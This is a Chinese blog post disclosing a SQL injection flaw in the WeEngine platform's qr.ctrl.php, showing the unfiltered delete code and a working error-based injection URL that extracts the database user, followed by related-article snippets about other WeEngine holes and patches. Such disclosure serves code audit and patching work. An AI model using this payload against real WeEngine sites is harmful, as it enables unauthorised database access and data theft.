qr.ctrl.php,微擎普通用户权限SQL注入漏洞

最新推荐文章于 2024-05-14 08:45:26 发布
最新推荐文章于 2024-05-14 08:45:26 发布
阅读量218 收藏
点赞数
文章标签: qr.ctrl.php

PHP 安全漏洞 SQL注入 代码审计 防护策略
关键词由CSDN通过智能技术生成

漏洞文件:web/source/platform/qr.ctrl.php

代码行:204左右if($do == 'delsata') {

$id = $_GPC['id'];

$b = pdo_delete('qrcode_stat',array('id' =>$id, 'uniacid' => $_W['uniacid']));

if ($b){

message('删除成功',url('platform/qr/display'),'success');

}else{

message('删除失败',url('platform/qr/display'),'error');

}

}

$_GPC['id']未过滤

构造payload:http://localhost/we7/web/index.php

?c=platform

&a=qr

&do=delsata&id[0]=1\&id[1]=)/**/and/**/extractvalue(1,/**/concat(0x5c,/**/(select/**/user())))--+

demo测试

8e9cd4dbb4d15a70f828aded285dc40b.png

朱moyimi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
awesome-qr.js
05-18
github地址:https://github.com/SumiMakito/Awesome-qr.js 一个很优秀的很漂亮的基于js开发的二维码生成开源库,可安装可本地,这是他的本地使用的技js文件,适合那些不方便安装第三方库的老项目 支持自定义二维码...
vue-qr:Awesome-qr.js的Vue 2.x组件
02-06
vue-qr 的Vue 2.x组件 您只需要Vue.js的一个qr代码组件! 注意 不支持IE不支持IE浏览器 样例 尝试使用智能手机扫描以下这些QR码。 例子1 例子2 例子3 例子4 演示版 运行npm run dev或yarn dev npm run dev或...
微擎mc.mod.php,微擎漏洞修复
weixin_39863759的博客
03-28 518
微擎的几个漏洞和解决办法,主要对sql注入微擎漏洞1,\web\source\extension\menu.ctl.php查找if(checksubmit('submit'))后面添加$_GPC['id']=intval($_GPC['id']);2,framework\model\mc.mod.php查找pdo_query($sql);在前面添加$sql=mysql_real_...
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 763
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
微擎系统-AccountEdit任意文件上传漏洞
最新发布
weixin_43167326的博客
05-14 1092
微擎系统是一款免费开源的多终端多站式管理系统,由宿州市微擎云计算有限公司开发。该系统基于最稳定的WEB2.0架构(php+mysql),内置多用户和分权功能,致力于将小程序和公众号等商业化、智慧化、场景化。微擎系统支持商城、餐饮、酒店、汽车、门店等多种行业解决方案,提供平台管理、用户管理、应用管理、权限组等多种功能,方便用户切换管理各平台,统一管理用户,一键运营商城、零售、营销等多行业应用。该系统还支持多账号管理,可对接应用市场应用,为商家提供高效、便捷的经营解决方案。
微擎上传php木马,龙兵智能名片上传漏洞修复教程,独立版和微擎版都有此漏洞...
weixin_39585795的博客
03-11 835
今日和代码族群主在群里闲聊,群友聊到了一个关于后门的事情,群主当时在群里提了部分程序官方就自带有漏洞,列举了一部分程序,里面有我正在使用的龙兵名片系统,于是和群主进行了沟通,了解漏洞的原理以及修复方法,于是想到了记录在这里,一方面作为自己的笔记,另一方面如果有网友也遇到了类似的问题,那么可以作为参考去解决。具体的漏洞为龙兵的附件上传功能,可以直接上传PHP文件,可以将php木马直接上传到服务器,然...
微擎任意删除漏洞
Edwin_jade的博客
09-01 322
找到文件“/网站更目录/web/source/founder/display.curl.php ”12行处 $founders = explode(',', $_W['config']['setting']['founder']); 添加 $identity = uni_permission($_W['uid']); if ($identity != ACCOUNT_MANAGE_NAME_FOUNDER && $identity != ACCOUNT_MANAGE_NAME_V.
微擎微赞系统BUG漏洞解决方法汇总
qq_36495140的博客
06-30 2031
** 微擎微赞系统BUG漏洞解决方法汇总 ** 汇总: 1、 漏洞名称: 微擎任意文件下载 漏洞文件路径:/framework/function/global.func.php 解决方法: //修复方法 //打开/framework/function/global.func.php文件 //搜索 if (strexists($t, 'http://') //复制代码 //找到 if (strexists($t, 'http://') || strexists($t, 'https://') || sub
qr.zip_QR码_qr
09-20
本压缩包文件“qr.zip”包含了一个关于QR码编码模块的相关资料,特别适用于在Windows环境下实现QR码的编码功能。 首先,我们需要理解QR码的基本结构。QR码由黑色和白色的方块组成,这些方块被称为模块,其中包含...
Awesome-qr.js:一个用JavaScript编写的很棒的QR代码生成器
05-02
Awesome-qr.js 一个用JavaScript编写的很棒但简单的QR代码生成器。 画廊 这些QR码是使用Awesome-qr.js制作的 :hugging_face: 内容 利润 CorrectLevel maskPattern 版本 组件 深色 colorLight autoColor 背景...
qr.rar_qr
09-21
在本案例中,"qr.rar_qr" 涉及到的是一种在SMP(Symmetric Multi-Processing,对称多处理)环境下并行计算的QR矩阵算法。SMP环境指的是多处理器系统,其中所有处理器共享同一内存空间,可以同时执行任务,提高计算...
store.ctrl.php,微擎普通用户权限SQL注入漏洞(2)
weixin_29716207的博客
03-23 363
/web/source/mc/store.ctrl.phpif($do=='delete'){$count=pdo_fetchcolumn('SELECTCOUNT(*)FROM'.tablename('activity_clerks').'WHEREuniacid=:uniacidANDstoreid=:id',array(':id'=>$_GP...
微赞/微擎文件编辑SQL注入漏洞补丁)
熊猫产品经理
01-21 6025
漏洞名称:微擎文件编辑SQL注入 补丁文件:/web/source/site/article.ctrl.php 补丁来源:阿里云云盾自研 漏洞描述:微擎的/web/source/site/article.ctrl.php中对$_GPC[‘template‘]、$_GPC[‘title‘]、$_GPC[‘description‘]、$_GPC[‘source‘]、$_GPC[‘au
微擎上传php木马,微擎1.5.4任意用户删除漏洞display.ctrl.php
weixin_36334284的博客
03-11 420
标题:微擎1.5.4任意用户删除漏洞描述:代码权限控制存在漏洞导致攻击者可任意删除用户。文件:/web/source/founder/display.ctrl.php漏洞修复方法:找到改行代码:$founders = explode(',', $_W['config']['setting']['founder']);在改行代码后面增加一段代码:$identity = uni_permission(...
微擎系统BUG漏洞解决方法汇总(原创)
weixin_34389926的博客
08-07 2389
微擎微赞系统BUG漏洞解决方法汇总 弄了微擎系统来玩玩,发觉这个系统BUG还不少,阿里云的提醒都一大堆,主要是没有针对SQL注入做预防,处理的办法基本都是用转义函数。   汇总: 1、 漏洞名称: 微擎任意文件下载 漏洞文件路径:/framework/function/global.func.php 解决方法:   修复方法: 打开/framework/function/global.fu...
阿里云提示微擎1.5.4任意文件删除漏洞解决办法
小白学堂
06-28 1035
阿里云感知给的提示是代码权限控制存在漏洞导致攻击者可任意删除用户。 目标文件: /web/source/founder/display.ctrl.php漏洞修复方法: 找到大约14行代码:内容如下 $founders = explode(',', $_W['config']['setting']['founder']); 在后面追加以下内容即可 $identity = uni_perm...
微擎漏洞修复记录
Make
02-23 2401
昨天丢了一套微擎系统上自己服务器做测试使用,今天在阿里云收到信息: 没有给阿里云交保护费,只能自己手动验证修复 1.微擎二次注入漏洞 web/source/mc/fangroup.ctrl.php 搜索下面内容,60行左右: $sql .= 'UPDATE ' . tablename('mc_mapping_fans') . " SET `groupid`='" . $...
PHP中给数组中追加元素
qq_42897782的博客
06-11 5907
在写接口的时候,有的参数需要合并成一个数组 如上,需要把选中的合并到上边的数组里边去 达到如上效果 实现代码如下 public function doPagecourseInfo() { global $_W, $_GPC; $uniacid = $_W['uniacid']; $id = $_GPC['id']; ...
为何MATLAB自带的qr.m算法会比householder qr
06-09
MATLAB自带的QR分解算法qr.m是一种基于Householder变换的QR分解算法,但它在实现上采用了一些特殊的技巧,从而使得它的性能要比传统的Householder QR分解更快。其中一些技巧包括: 1. 采用分块技术:qr.m算法将大的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值